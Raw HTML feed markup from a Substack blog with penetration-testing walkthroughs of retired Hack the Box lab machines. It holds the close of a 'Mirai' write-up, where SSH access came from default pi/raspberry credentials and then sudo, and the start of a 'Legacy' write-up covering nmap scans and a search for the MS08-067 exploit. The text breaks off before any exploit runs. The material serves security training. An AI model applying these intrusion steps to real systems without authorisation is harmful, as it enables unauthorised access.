https://substackcdn.com/image/fetch/$s_!TCZB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TCZB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TCZB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 424w, https://substackcdn.com/image/fetch/$s_!TCZB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 848w, https://substackcdn.com/image/fetch/$s_!TCZB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 1272w, https://substackcdn.com/image/fetch/$s_!TCZB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Note: Alternatively, we could have used strings on the file to see this more cleanly.</p><p>That&#8217;s all she wrote.</p><h3>Findings, Sample Code, and Flags</h3><p>Finding 1: The Mirai system is using default credentials that are publicly accessible on the internet.</p><p>Finding 2: The &#8216;pi&#8217; user that is a default account is enabled under the same name.</p><p>Finding 3: The &#8216;pi&#8217; user has sudo permissions.</p><h3>Additional Actions</h3><p>None.</p><h3>High-Level Summary and Recommendations</h3><p>C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Mirai (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using default credentials (user name: pi, password: raspberry), C_3PJoe was able to gain access to the user as pi.</p><p>Once on the system, pi had sudo permissions that enabled the adversary to escalate to root-level permissions.</p><p>Recommend disabling default accounts and changing default passwords.</p><h3>Tools Used</h3><p>nmap<br>SearchSploit<br>Medusa<br>SSH</p><p>Other Walktroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-blue-7fe9eb09d15">Blue</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-lame-5cf414d1c523">Lame</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560">Arctic</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-legacy-147bbcc9ff02">Legacy</a></p>]]></content:encoded></item><item><title><![CDATA[HTB Retired Box Walkthrough: Legacy]]></title><description><![CDATA[Legacy is a retired Windows machine that is rated as Easy on Hack the Box.]]></description><link>https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-legacy-147bbcc9ff02</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-legacy-147bbcc9ff02</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Tue, 10 Sep 2019 19:33:28 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!PdTr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Legacy is a retired Windows machine that is rated as Easy on Hack the Box.</p><blockquote><p><em>Hostname: Legacy<br>IP: 10.10.10.4<br>Operating System: Windows</em></p></blockquote><h3>Port Scan Results*</h3><p>A simple nmap port scan <em>nmap -vvvvv 10.10.10.4 yields the following ports:</em></p><blockquote><p><em>139/tcp: netbios-ssn<br>445/tcp: microsoft-ds<br>3389/tcp: ms-wbt-server (terminal services aka Remote Desktop or RDP)</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!PdTr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!PdTr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 424w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 848w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 1272w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!PdTr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!PdTr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 424w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 848w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 1272w, https://substackcdn.com/image/fetch/$s_!PdTr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f6ffcaa-6283-4418-af30-11d8371af20f_800x349.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><h3>Further Enumeration*</h3><p>Let&#8217;s go a little deeper with version numbers. We know it&#8217;s a Windows system and the name is a hint of sorts it seems. I use <em>nmap -vvvvv -A -sVT 10.10.10.4.</em></p><blockquote><p><em>139/tcp: Microsoft Windows netbios-ssn<br>445/tcp: Microsoft Windows XP microsoft-ds<br>3389/tcp: ms-wbt-server (conn-refused)</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kr1Z!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kr1Z!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 424w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 848w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 1272w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kr1Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kr1Z!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 424w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 848w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 1272w, https://substackcdn.com/image/fetch/$s_!kr1Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe640b56f-3d30-41e3-897f-33ceb84d717d_800x189.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zkue!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zkue!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 424w, https://substackcdn.com/image/fetch/$s_!zkue!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 848w, https://substackcdn.com/image/fetch/$s_!zkue!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 1272w, https://substackcdn.com/image/fetch/$s_!zkue!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zkue!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zkue!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 424w, https://substackcdn.com/image/fetch/$s_!zkue!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 848w, https://substackcdn.com/image/fetch/$s_!zkue!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 1272w, https://substackcdn.com/image/fetch/$s_!zkue!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7448a061-1674-47bb-8807-50b5e1ab1098_800x118.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IzgQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IzgQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 424w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 848w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 1272w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IzgQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IzgQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 424w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 848w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 1272w, https://substackcdn.com/image/fetch/$s_!IzgQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b377891-bb6e-4e7e-a9e7-6d882e32bee6_800x589.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Windows XP with SMB, this can typically mean only one thing in HTB or a CTF: <strong><a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067">MS08&#8211;067</a>!</strong></p><p>Let&#8217;s see if we can get anything from smbclient:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MvPt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MvPt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 424w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 848w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 1272w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MvPt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MvPt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 424w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 848w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 1272w, https://substackcdn.com/image/fetch/$s_!MvPt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F03fc6006-9fc1-4ac6-9707-15792b42fa37_800x76.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That was a bust, let&#8217;s see what Searchsploit has to offer via <em>searchsploit 08&#8211;067</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!W-qa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!W-qa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 424w, https://substackcdn.com/image/fetch/$s_!W-qa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 848w, https://substackcdn.com/image/fetch/$s_!W-qa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 1272w, https://substackcdn.com/image/fetch/$s_!W-qa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!W-qa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/40320c3b-92de-40dc-b99e-4679f598403f_800x135.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!W-qa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 424w, 